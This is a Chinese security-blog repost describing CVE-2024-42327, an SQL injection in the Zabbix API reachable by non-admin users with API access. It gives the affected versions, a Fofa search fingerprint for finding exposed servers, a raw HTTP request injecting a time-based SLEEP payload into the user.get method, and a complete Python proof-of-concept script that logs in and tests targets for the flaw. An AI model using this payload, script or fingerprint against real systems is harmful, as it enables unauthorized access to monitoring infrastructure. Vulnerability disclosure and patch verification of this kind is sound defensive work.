Zabbix 存在SQL注入漏洞 (CVE-2024-42327) PoC

admin 2024年12月16日13:42:40评论17 views字数 2990阅读9分58秒阅读模式
 

0x00 前言

Zabbix 是一款可监控网络的众多参数以及服务器、虚拟机、应用程序、服务、数据库、网站、云等的健康状况和完整性。Zabbix 使用灵活的通知机制,允许用户为几乎任何事件配置基于电子邮件的警报。这允许对服务器问题做出快速反应。Zabbix 基于存储的数据提供报告和数据可视化功能.

受影响版本:

- 6.0.0 – 6.0.31- 6.4.0 – 6.4.16- 7.0.0

Fofa指纹:app="ZABBIX-监控系统"

Zabbix 存在SQL注入漏洞 (CVE-2024-42327) PoCZabbix 存在SQL注入漏洞 (CVE-2024-42327) PoCZabbix 存在SQL注入漏洞 (CVE-2024-42327) PoC

0x01 漏洞分析&复现

Zabbix 前端上具有默认 User 角色或具有任何其他授予 API 访问权限的角色的非 admin 用户帐户可以利用此漏洞。SQLi 存在于 addRelatedObjects 函数的 CUser 类中,此函数是从 CUser.get 函数调用的,该函数可供具有 API 访问权限的每个用户使用。

Payload:

POST /api_jsonrpc.php HTTP/1.1Host: localhostUser-Agent: curl/8.11.0Accept: */*Content-Type: application/jsonContent-Length: 222Connection: keep-alive{  "jsonrpc": "2.0",  "method": "user.get",  "params": {    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],    "userids": ["1","2"]  },  "id": 1,  "auth": ""}

POC使用:

Zabbix 存在SQL注入漏洞 (CVE-2024-42327) PoC

0x02 漏洞POC

https://github.com/compr00t/CVE-2024-42327

import requests
import argparse
import time

"""
Optimized Proof of Concept for CVE-2024-42327
Author: Patrick Schmid (compr00t.bsky.social)

References:
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623

Disclaimer:
This script is provided for educational purposes only!
"""

HEADERS = {"Content-Type": "application/json"}

def get_auth_token(target, username, password):
    """Obtain a valid session token from the target."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": username, "password": password},
        "id": 1,
        "auth": None
    }

    try:
        response = requests.post(url, json=login_data, headers=HEADERS)
        response.raise_for_status()
        result = response.json().get("result")
        if result:
            print(f"[+] Session token: {result}")
            return result
        else:
            print("[-] Failed to retrieve session token. Check credentials.")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during login.")
    return None

def test_sqli(target, auth_token):
    """Test the target for SQL injection vulnerability."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    user_data = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
            "userids": ["1", "2"]
        },
        "id": 1,
        "auth": auth_token
    }

    try:
        start_time = time.perf_counter()
        response = requests.post(url, json=user_data, headers=HEADERS)
        response.raise_for_status()
        elapsed_time = time.perf_counter() - start_time

        if elapsed_time < 5:
            print("[+] Response time < 5 seconds. Target is NOT vulnerable.")
        else:
            print(f"[!] Response time: {elapsed_time:.2f} seconds. Target is VULNERABLE!")
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi test request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during SQLi test.")

def main():
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2024-42327"
    )
    parser.add_argument("-t", "--target", required=True, help="The API endpoint URL.")
    parser.add_argument("-u", "--username", required=True, help="The username for authentication.")
    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")

    args = parser.parse_args()

    auth_token = get_auth_token(args.target, args.username, args.password)
    if auth_token:
        test_sqli(args.target, auth_token)

if __name__ == "__main__":
    main()

 

原文始发于微信公众号(星悦安全):Zabbix 存在SQL注入漏洞 (CVE-2024-42327)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月16日13:42:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Zabbix 存在SQL注入漏洞 (CVE-2024-42327) PoChttp://cn-sec.com/archives/3508588.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息